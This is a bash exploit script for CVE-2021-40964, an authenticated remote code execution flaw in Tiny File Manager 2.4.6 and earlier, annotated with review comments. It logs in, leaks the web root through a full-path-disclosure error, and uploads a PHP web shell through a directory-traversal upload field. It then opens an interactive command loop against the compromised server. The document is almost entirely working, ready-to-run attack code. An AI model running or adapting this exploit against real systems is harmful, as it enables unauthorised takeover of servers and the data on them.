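#!/usr/bin/env bash
# Exploit Title: Tiny File Manager <= 2.4.6 - Remote Code Execution (RCE)
# Exploit Author: Z3R0 (0x30)
# Version: Tiny File Manager <= 2.4.6
# CVE: CVE-2021-40964
#
# Usage: ./exploit.sh <url> <user> <pass>
#
# Authenticated flow:
#   1. log in and capture the session cookie
#   2. leak the server-side path via the "upload from URL" error (full path
#      disclosure), falling back to /var/www/html
#   3. upload a PHP file whose "fullpath" form field carries a directory
#      traversal so it lands under the web root
#   4. confirm the dropped file executes, then loop commands to it
#
# Requirements: bash, curl, jq (GNU coreutils assumed).
#
# Review notes:
#   * <url> is concatenated with "?p=tiny/uploads" for the file-manager
#     requests and with "uploads" for the dropped file, so it must end in a
#     trailing slash and the manager must be the directory index; a URL that
#     ends in "tinyfilemanager.php" will not work for the shell check.
#   * The password is passed on argv and is therefore visible to every local
#     user through `ps` / /proc for the lifetime of the script. Fine for a
#     one-off PoC; do not wrap this in automation without changing that.
#   * A Set-Cookie header is treated as "login succeeded". A session cookie
#     may well be issued to anonymous clients too, so a wrong password can
#     surface later as "File Upload Unsuccessful" rather than "Login Failed".

# -u: unset variables are bugs here. -e/pipefail are deliberately NOT used:
# several pipelines below end in head/grep, which exit early and would turn a
# successful run into a SIGPIPE failure under pipefail.
set -u

# Globals shared between the stages (set by auth/get_webroot/upload_file).
URL=""
COOKIE=""
WEBROOT=""
WEB_URL=""
shell=""
PAYLOAD_FILE=""

#######################################
# Abort unless a required tool is on PATH.
# Arguments: $1 - tool name
#######################################
require_tool() {
  local tool=$1
  if command -v -- "$tool" >/dev/null 2>&1; then
    printf '[*] %s found\n' "$tool"
  else
    printf '[-] %s not found! Exiting...\n' "$tool" >&2
    exit 1
  fi
}

#######################################
# Verify curl and jq are available before doing any network work.
#######################################
check() {
  require_tool curl
  require_tool jq
}

#######################################
# Print usage (reached when fewer than three non-empty args are given).
#######################################
usage() {
  printf '\n Tiny File Manager Authenticated RCE ~ By Z3R0\n\n'
  printf ' Usage: %s <url> <user> <pass>\n\n' "$0"
}

#######################################
# Log in and capture the first cookie name=value pair from Set-Cookie.
# Globals:   URL (written), COOKIE (written)
# Arguments: $1 - base URL, $2 - username, $3 - password
# Exits 1 when no Set-Cookie header comes back.
#######################################
auth() {
  local url=$1 user=$2 pass=$3
  URL=$url
  # --data-urlencode so a password containing '&', '=' or '%' cannot break
  # or alter the form body (the original sent the raw string).
  COOKIE=$(curl -s -i -X POST \
      --data-urlencode "fm_usr=${user}" \
      --data-urlencode "fm_pwd=${pass}" \
      -- "$url" \
    | grep -i '^Set-Cookie: ' \
    | head -n 1 \
    | sed -E 's/^[Ss]et-[Cc]ookie:[[:space:]]*//' \
    | cut -d ';' -f 1 \
    | tr -d ' \r')
  if [[ -n "$COOKIE" ]]; then
    printf '\n[+] Login Successful! Cookie: %s\n' "$COOKIE"
  else
    printf '\n[-] Login Failed!\n' >&2
    exit 1
  fi
}

#######################################
# Trigger an "upload from URL" with an unresolvable host so the JSON error
# reveals a local filesystem path; keep its directory part as WEBROOT.
# Globals:   URL, COOKIE (read), WEBROOT (written)
# Falls back to /var/www/html when nothing usable comes back.
#######################################
get_webroot() {
  local leaked
  printf '\n[*] Try to Leak Web root directory path\n\n'
  # Any "file" key, at any depth, of the JSON reply. NOTE(review): the exact
  # response schema is not visible here; the original grepped any line
  # containing "file", which this mirrors. Non-JSON replies (e.g. an HTML
  # login page) make jq fail and we fall through to the default.
  leaked=$(curl -s -X POST \
      -H "Cookie: ${COOKIE}" \
      -d 'type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true' \
      -- "${URL}?p=tiny/uploads" 2>/dev/null \
    | jq -r '.. | objects | .file? // empty' 2>/dev/null \
    | head -n 1)
  if [[ -n "$leaked" && "$leaked" == */* ]]; then
    # Drop the last path component, keep a trailing slash (as the original did).
    WEBROOT="${leaked%/*}/"
    printf '[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : %s\n\n' "$WEBROOT"
  else
    printf "[-] Can't find WEBROOT! Using default /var/www/html\n" >&2
    WEBROOT="/var/www/html"
  fi
}

#######################################
# Write the PHP payload to a temp file and upload it with a traversal-laden
# "fullpath" so it is written under ${WEBROOT}/uploads/.
# Globals:   URL, COOKIE, WEBROOT (read), shell, PAYLOAD_FILE (written)
# Returns:   0 when the reply contains "successful", non-zero otherwise
#######################################
upload_file() {
  shell="zero_shell${RANDOM}.php"
  # mktemp instead of a predictable /tmp/<name>: a world-writable, guessable
  # path lets another local user pre-create/symlink it.
  PAYLOAD_FILE=$(mktemp) || { printf '[-] mktemp failed\n' >&2; return 1; }
  trap 'rm -f -- "$PAYLOAD_FILE"' EXIT
  # NOTE(review): in the published listing this line is an empty `echo ""`
  # (the PHP tag was eaten by the page renderer). The handler below is the
  # minimal one consistent with the checks that follow: GET ?cmd=echo%20found
  # and POST cmd=<command>.
  printf '%s\n' '<?php system($_REQUEST["cmd"]); ?>' > "$PAYLOAD_FILE"
  # ";filename=" keeps the original upload name (the temp file has none).
  curl -s -X POST \
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' \
    -b "$COOKIE" \
    -F 'p=tiny/uploads' \
    -F "fullpath=../../../../../../../..${WEBROOT}/uploads/${shell}" \
    -F "file=@${PAYLOAD_FILE};filename=${shell}" \
    -- "${URL}?p=tiny/uploads" \
    | grep 'successful' >/dev/null
}

#######################################
# Upload the shell, confirm it runs, then relay commands interactively.
# Globals:   URL, shell (read), WEB_URL (written)
# Exits 1 on upload failure, 2 when the dropped file does not answer.
#######################################
exploitMe() {
  local reply cmd
  WEB_URL="${URL}uploads"
  printf '%s\n' "$WEB_URL"
  if upload_file; then
    printf '[+] File Upload Successful!\n'
  else
    printf '[-] File Upload Unsuccessful! Exiting...\n' >&2
    exit 1
  fi
  printf '[+] Checking for the shell...\n'
  reply=$(curl -s -- "${WEB_URL}/${shell}?cmd=echo%20found")
  # Only the first line is inspected, as in the original.
  if [[ "${reply%%$'\n'*}" == *found* ]]; then
    printf '[+] Shell found %s/%s\n' "$WEB_URL" "$shell"
  else
    printf '[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting...\n' >&2
    exit 2
  fi
  printf '[+] Getting shell access!\n\n'
  # read -r keeps backslashes; EOF (Ctrl-D) ends the loop cleanly.
  while printf 'Z3R0~$ ' && IFS= read -r cmd; do
    curl -s -X POST --data-urlencode "cmd=${cmd}" -- "${WEB_URL}/${shell}"
  done
  printf '\n'
}

#######################################
# Entry point: three non-empty positional args run the chain, else usage.
#######################################
main() {
  if [[ $# -ge 3 && -n "$1" && -n "$2" && -n "$3" ]]; then
    check
    auth "$1" "$2" "$3"
    get_webroot
    exploitMe
  else
    usage
  fi
}

main "$@"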